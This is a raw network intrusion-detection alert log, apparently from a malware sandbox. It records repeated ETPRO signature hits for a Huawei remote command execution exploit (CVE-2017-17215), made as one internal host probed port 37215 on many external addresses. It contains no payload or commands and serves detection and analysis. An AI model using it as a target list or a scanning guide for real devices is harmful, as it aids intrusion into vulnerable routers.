                                                        06/13/24-21:32:46.510312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975837215192.168.2.14156.62.150.149
                                                        06/13/24-21:33:13.212547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177437215192.168.2.14156.127.236.58
                                                        06/13/24-21:31:57.130958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528037215192.168.2.14156.88.26.137
                                                        06/13/24-21:33:04.993013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146837215192.168.2.1441.111.210.183
                                                        06/13/24-21:32:42.409536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982837215192.168.2.14197.153.110.89
                                                        06/13/24-21:33:07.055536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4438637215192.168.2.14197.202.20.75
                                                        06/13/24-21:32:23.832249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592237215192.168.2.1441.183.121.164
                                                        06/13/24-21:32:30.127191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3962837215192.168.2.14156.131.115.72
                                                        06/13/24-21:32:01.247953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702237215192.168.2.14156.210.92.132
                                                        06/13/24-21:32:30.128296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114637215192.168.2.14197.22.221.144
                                                        06/13/24-21:32:23.835871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892437215192.168.2.14197.154.198.144
                                                        06/13/24-21:32:52.656981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279837215192.168.2.14197.24.189.47
                                                        06/13/24-21:32:48.554877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3360237215192.168.2.14197.150.244.20
                                                        06/13/24-21:33:13.229304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791437215192.168.2.1441.164.46.19
                                                        06/13/24-21:33:09.106689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092637215192.168.2.1441.120.190.255
                                                        06/13/24-21:31:57.154081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950437215192.168.2.14156.214.63.184
                                                        06/13/24-21:33:13.229708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378037215192.168.2.1441.62.186.87
                                                        06/13/24-21:33:04.992959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094237215192.168.2.1441.199.73.34
                                                        06/13/24-21:32:21.784767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937037215192.168.2.14156.117.6.135
                                                        06/13/24-21:32:11.510217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4558637215192.168.2.14197.183.8.238
                                                        06/13/24-21:32:11.510243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653237215192.168.2.14197.62.245.82
                                                        06/13/24-21:33:11.158781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874237215192.168.2.14197.169.118.79
                                                        06/13/24-21:32:30.077558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640237215192.168.2.14156.95.255.25
                                                        06/13/24-21:32:09.458627TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686637215192.168.2.1441.20.25.150
                                                        06/13/24-21:32:44.480310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009837215192.168.2.14197.176.195.164
                                                        06/13/24-21:33:09.107755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225037215192.168.2.14197.236.116.106
                                                        06/13/24-21:32:52.670530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537437215192.168.2.14197.179.20.198
                                                        06/13/24-21:33:07.042982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181237215192.168.2.1441.248.146.69
                                                        06/13/24-21:32:09.439401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518237215192.168.2.14156.142.202.137
                                                        06/13/24-21:32:13.567110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375837215192.168.2.14197.164.210.122
                                                        06/13/24-21:31:59.174527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815837215192.168.2.14156.116.143.128
                                                        06/13/24-21:32:13.568044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216637215192.168.2.14156.25.104.138
                                                        06/13/24-21:32:36.247885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642437215192.168.2.14156.104.101.168
                                                        06/13/24-21:32:50.632692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520037215192.168.2.1441.173.110.100
                                                        06/13/24-21:32:36.262733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066437215192.168.2.14197.252.250.209
                                                        06/13/24-21:32:11.507741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5886037215192.168.2.14197.196.132.11
                                                        06/13/24-21:33:00.884403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826437215192.168.2.14197.32.101.186
                                                        06/13/24-21:33:13.229748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955637215192.168.2.1441.244.92.39
                                                        06/13/24-21:32:17.676382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623637215192.168.2.14197.191.124.123
                                                        06/13/24-21:32:03.278013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521237215192.168.2.14156.98.126.146
                                                        06/13/24-21:32:52.670665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5561037215192.168.2.14156.163.86.133
                                                        06/13/24-21:32:30.077513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324637215192.168.2.14156.114.105.196
                                                        06/13/24-21:32:40.371972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258237215192.168.2.1441.25.232.29
                                                        06/13/24-21:32:01.219956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064837215192.168.2.14197.109.98.211
                                                        06/13/24-21:32:07.416217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618237215192.168.2.14156.69.232.206
                                                        06/13/24-21:32:46.509997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353037215192.168.2.1441.191.88.228
                                                        06/13/24-21:32:54.710949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787637215192.168.2.14156.46.126.112
                                                        06/13/24-21:32:19.726684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723837215192.168.2.14197.149.41.67
                                                        06/13/24-21:32:42.409036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4096237215192.168.2.14156.35.40.44
                                                        06/13/24-21:33:09.106658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172837215192.168.2.14197.213.19.158
                                                        06/13/24-21:33:09.107444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805237215192.168.2.1441.13.76.203
                                                        06/13/24-21:32:58.824305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664237215192.168.2.14197.2.16.161
                                                        06/13/24-21:33:00.885014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930837215192.168.2.14156.230.40.12
                                                        06/13/24-21:32:46.501645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336837215192.168.2.14197.13.76.132
                                                        06/13/24-21:32:54.711060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917037215192.168.2.14156.23.198.114
                                                        06/13/24-21:32:03.307261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627837215192.168.2.1441.10.71.174
                                                        06/13/24-21:32:54.727419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661237215192.168.2.14197.134.35.163
                                                        06/13/24-21:32:03.299151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113837215192.168.2.1441.73.50.38
                                                        06/13/24-21:32:09.456745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529637215192.168.2.14197.212.86.204
                                                        06/13/24-21:32:30.099140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380037215192.168.2.14197.40.209.126
                                                        06/13/24-21:32:48.572924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5928237215192.168.2.14197.110.115.230
                                                        06/13/24-21:32:28.026696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544637215192.168.2.14197.224.81.177
                                                        06/13/24-21:32:28.027894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334437215192.168.2.1441.57.158.161
                                                        06/13/24-21:31:57.129876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507837215192.168.2.14156.31.9.128
                                                        06/13/24-21:32:50.617831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122637215192.168.2.14156.224.133.219
                                                        06/13/24-21:32:44.454640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452837215192.168.2.1441.144.188.222
                                                        06/13/24-21:33:09.107155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184237215192.168.2.1441.251.215.8
                                                        06/13/24-21:32:13.547196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886837215192.168.2.14156.139.21.200
                                                        06/13/24-21:32:13.545809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383637215192.168.2.1441.162.129.119
                                                        06/13/24-21:32:19.728783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162637215192.168.2.1441.142.55.11
                                                        06/13/24-21:32:52.655263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605237215192.168.2.14156.219.211.37
                                                        06/13/24-21:32:44.474209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007037215192.168.2.1441.144.20.70
                                                        06/13/24-21:32:30.123453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5397437215192.168.2.1441.70.47.149
                                                        06/13/24-21:32:38.304315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664837215192.168.2.14197.80.126.178
                                                        06/13/24-21:33:09.106553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762637215192.168.2.14156.198.117.97
                                                        06/13/24-21:32:21.803137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640037215192.168.2.1441.64.84.108
                                                        06/13/24-21:32:38.301690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934437215192.168.2.14156.40.241.212
                                                        06/13/24-21:32:09.438778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348037215192.168.2.14156.121.51.60
                                                        06/13/24-21:32:17.694419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5859037215192.168.2.14156.109.0.210
                                                        06/13/24-21:33:15.275113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088437215192.168.2.14197.164.189.192
                                                        06/13/24-21:32:23.934532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724037215192.168.2.1441.69.101.45
                                                        06/13/24-21:33:07.039168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284437215192.168.2.14197.56.232.9
                                                        06/13/24-21:32:30.095756TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913237215192.168.2.14197.143.63.43
                                                        06/13/24-21:33:04.993634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838037215192.168.2.1441.123.57.3
                                                        06/13/24-21:32:38.303950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358637215192.168.2.14156.31.195.203
                                                        06/13/24-21:32:32.150521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553437215192.168.2.14156.87.93.92
                                                        06/13/24-21:32:07.402677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933237215192.168.2.14197.173.85.96
                                                        06/13/24-21:32:48.554414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4711037215192.168.2.1441.140.198.126
                                                        06/13/24-21:32:25.991738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967237215192.168.2.14156.225.55.198
                                                        06/13/24-21:32:54.707307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.1441.98.32.141
                                                        06/13/24-21:32:11.486866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405237215192.168.2.14156.242.34.241
                                                        06/13/24-21:32:50.612008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744037215192.168.2.1441.180.108.72
                                                        06/13/24-21:32:32.152923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4149837215192.168.2.1441.185.11.65
                                                        06/13/24-21:32:42.424082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595837215192.168.2.14197.215.135.51
                                                        06/13/24-21:32:15.607494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476037215192.168.2.14197.182.144.2
                                                        06/13/24-21:32:05.377344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336637215192.168.2.1441.21.189.75
                                                        06/13/24-21:32:44.480438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120637215192.168.2.14156.99.6.206
                                                        06/13/24-21:32:25.975780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297037215192.168.2.1441.199.103.17
                                                        06/13/24-21:32:44.454943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3528437215192.168.2.14156.139.117.226
                                                        06/13/24-21:32:38.304049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747037215192.168.2.14156.136.94.233
                                                        06/13/24-21:32:25.971231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643437215192.168.2.14197.51.220.172
                                                        06/13/24-21:33:00.869817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871837215192.168.2.14197.165.32.161
                                                        06/13/24-21:32:21.784309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126837215192.168.2.1441.147.234.100
                                                        06/13/24-21:32:28.026985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3308637215192.168.2.1441.129.164.149
                                                        06/13/24-21:33:07.040813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442237215192.168.2.14197.16.46.88
                                                        06/13/24-21:32:58.839153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925437215192.168.2.1441.166.190.99
                                                        06/13/24-21:33:00.887209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860637215192.168.2.1441.10.218.210
                                                        06/13/24-21:32:11.486941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987237215192.168.2.14156.92.140.185
                                                        06/13/24-21:33:07.039000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5452437215192.168.2.14156.109.232.28
                                                        06/13/24-21:33:07.055510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5623837215192.168.2.1441.115.218.18
                                                        06/13/24-21:32:34.191377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845637215192.168.2.14197.217.119.105
                                                        06/13/24-21:33:09.111834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603437215192.168.2.14197.194.244.110
                                                        06/13/24-21:33:02.911342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892837215192.168.2.14156.27.152.233
                                                        06/13/24-21:32:36.247429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249437215192.168.2.1441.14.149.202
                                                        06/13/24-21:32:11.485089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215037215192.168.2.1441.103.79.252
                                                        06/13/24-21:32:34.216927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101837215192.168.2.1441.212.10.81
                                                        06/13/24-21:33:09.086660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995637215192.168.2.1441.123.100.87
                                                        06/13/24-21:32:28.027740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567637215192.168.2.1441.229.153.167
                                                        06/13/24-21:32:42.423672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333237215192.168.2.1441.118.220.67
                                                        06/13/24-21:32:40.358915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3436037215192.168.2.14197.2.175.245
                                                        06/13/24-21:32:07.416142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518437215192.168.2.1441.40.232.196
                                                        06/13/24-21:33:15.254153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981037215192.168.2.1441.149.31.231
                                                        06/13/24-21:32:28.044815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754037215192.168.2.1441.143.194.64
                                                        06/13/24-21:32:54.709870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4745637215192.168.2.14197.111.100.208
                                                        06/13/24-21:32:54.710210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543637215192.168.2.14156.191.157.63
                                                        06/13/24-21:33:07.058705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784437215192.168.2.14197.80.52.177
                                                        06/13/24-21:32:25.969166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124437215192.168.2.14156.37.6.201
                                                        06/13/24-21:32:03.301456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019037215192.168.2.14197.255.141.127
                                                        06/13/24-21:32:23.940748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4928837215192.168.2.14156.202.146.249
                                                        06/13/24-21:32:36.248767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937437215192.168.2.14156.80.60.214
                                                        06/13/24-21:33:04.990859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877437215192.168.2.1441.244.30.234
                                                        06/13/24-21:31:57.094004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310037215192.168.2.1441.164.167.64
                                                        06/13/24-21:33:00.888691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153037215192.168.2.14156.136.121.91
                                                        06/13/24-21:32:03.275771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316437215192.168.2.14156.148.90.191
                                                        06/13/24-21:32:03.304143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226237215192.168.2.14197.54.214.186
                                                        06/13/24-21:33:15.257881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626637215192.168.2.14156.115.121.125
                                                        06/13/24-21:32:11.485484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817437215192.168.2.14156.111.160.72
                                                        06/13/24-21:32:28.042671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413237215192.168.2.14156.196.170.195
                                                        06/13/24-21:33:15.251639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743437215192.168.2.14197.129.58.123
                                                        06/13/24-21:32:03.274412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488837215192.168.2.14156.38.21.80
                                                        06/13/24-21:32:07.419930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3635237215192.168.2.14156.17.72.28
                                                        06/13/24-21:32:40.356984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3609037215192.168.2.1441.83.178.152
                                                        06/13/24-21:32:07.403936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250437215192.168.2.14197.42.253.191
                                                        06/13/24-21:32:28.043149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931037215192.168.2.1441.250.16.27
                                                        06/13/24-21:32:54.726268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5410437215192.168.2.14197.119.157.122
                                                        06/13/24-21:33:13.210302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5690037215192.168.2.14197.31.104.79
                                                        06/13/24-21:32:05.370631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774637215192.168.2.14197.172.142.126
                                                        06/13/24-21:33:15.276889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481037215192.168.2.14197.193.252.60
                                                        06/13/24-21:32:25.992682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5419637215192.168.2.1441.101.111.49
                                                        06/13/24-21:32:11.488877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612437215192.168.2.14156.182.9.188
                                                        06/13/24-21:32:25.993909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262837215192.168.2.14156.101.89.162
                                                        06/13/24-21:32:36.263448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822237215192.168.2.14197.27.107.39
                                                        06/13/24-21:32:40.359373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901437215192.168.2.1441.24.8.15
                                                        06/13/24-21:32:28.048423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803837215192.168.2.14197.23.61.70
                                                        06/13/24-21:32:30.079300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5922037215192.168.2.14156.43.95.98
                                                        06/13/24-21:32:30.098937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134037215192.168.2.14197.4.111.153
                                                        06/13/24-21:32:44.450610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871437215192.168.2.14197.204.110.97
                                                        06/13/24-21:33:13.214421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640237215192.168.2.14197.197.208.177
                                                        06/13/24-21:33:09.128048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235237215192.168.2.14197.2.80.1
                                                        06/13/24-21:32:42.419327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065837215192.168.2.14156.99.194.164
                                                        06/13/24-21:32:40.355774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512637215192.168.2.14156.196.125.7
                                                        06/13/24-21:32:07.416124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836637215192.168.2.14197.32.49.216
                                                        06/13/24-21:32:52.659682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554437215192.168.2.14156.173.112.149
                                                        06/13/24-21:32:52.659903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4387837215192.168.2.1441.237.133.44
                                                        06/13/24-21:33:09.127049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400437215192.168.2.14197.187.38.81
                                                        06/13/24-21:32:19.729634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588837215192.168.2.14156.183.184.205
                                                        06/13/24-21:32:38.296232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493437215192.168.2.1441.235.27.218
                                                        06/13/24-21:32:40.355299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3949837215192.168.2.14156.230.142.125
                                                        06/13/24-21:32:52.677464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219237215192.168.2.1441.57.116.32
                                                        06/13/24-21:32:09.439282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940837215192.168.2.14156.26.150.99
                                                        06/13/24-21:33:02.908207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5429237215192.168.2.14197.33.0.23
                                                        06/13/24-21:32:15.608088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5507037215192.168.2.14197.77.240.185
                                                        06/13/24-21:33:15.257561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672037215192.168.2.1441.179.76.246
                                                        06/13/24-21:32:48.556026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071637215192.168.2.14197.8.213.142
                                                        06/13/24-21:31:59.177608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558837215192.168.2.14156.237.117.182
                                                        06/13/24-21:32:40.376864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625437215192.168.2.14156.119.32.254
                                                        06/13/24-21:32:52.659234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528037215192.168.2.1441.223.91.10
                                                        06/13/24-21:32:25.994124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4843637215192.168.2.1441.77.91.74
                                                        06/13/24-21:32:11.488658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416837215192.168.2.1441.66.61.196
                                                        06/13/24-21:32:46.508321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384237215192.168.2.1441.155.46.18
                                                        06/13/24-21:32:17.697582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3553437215192.168.2.14156.165.31.22
                                                        06/13/24-21:32:21.801248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917437215192.168.2.14197.39.125.141
                                                        06/13/24-21:32:17.702441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895437215192.168.2.14156.191.215.77
                                                        06/13/24-21:33:15.252479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237837215192.168.2.14197.244.174.224
                                                        06/13/24-21:32:30.092029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982037215192.168.2.14197.179.77.76
